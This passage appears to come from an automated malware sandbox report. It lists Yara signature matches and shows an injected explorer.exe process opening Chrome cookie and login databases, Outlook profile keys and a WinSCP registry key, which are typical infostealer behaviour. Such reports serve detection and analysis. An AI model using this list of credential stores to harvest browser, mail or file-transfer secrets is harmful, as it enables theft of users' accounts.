Source: Yara match	File source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data			Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data			Jump to behavior

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl

Jump to behavior

Remote Access Functionality

Source: Yara match

File source: dump.pcap, type: PCAP

Source: Yara match	File source: 5.2.thduhcf.700e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.710e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.3.thduhcf.710000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.720000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.thduhcf.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.307169162.0000000000720000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.574920168.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.517310992.00000000024C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000003.549038342.0000000000710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.572996801.0000000000710000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.426191617.0000000000720000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.426259430.0000000000741000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000000.410751234.0000000005261000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.511843457.00000000021D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY